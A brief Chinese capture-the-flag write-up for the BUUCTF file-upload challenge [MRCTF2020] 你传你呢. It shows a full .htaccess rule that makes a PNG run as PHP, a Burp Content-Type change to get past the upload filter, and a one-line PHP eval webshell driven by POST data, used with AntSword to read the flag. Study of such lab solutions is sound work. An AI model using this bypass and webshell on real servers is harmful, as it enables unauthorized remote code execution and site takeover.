BUU-WEB-[MRCTF2020]你传你呢
Posted TzZzEZ-web
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[MRCTF2020]你传你呢相关的知识,希望对你有一定的参考价值。
[MRCTF2020]你传你🐎呢
文件上传漏洞。
通过测试只能上传图片格式,于是通过.htaccess配置文件进行修改,将图片格式自动转换成php文件。
具体.htaccess作用可以百度百科一下。
.htaccess配置文件:
<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>
上传时使用burp修改文件格式,改成image/jpeg即可上传成功。
上传图片木马:
<?php
@eval($_POST['shell'])
?>
(不需要做任何修改,直接上传图片木马即可)
使用蚁剑连接。
flag在根目录下面。
以上是关于BUU-WEB-[MRCTF2020]你传你呢的主要内容,如果未能解决你的问题,请参考以下文章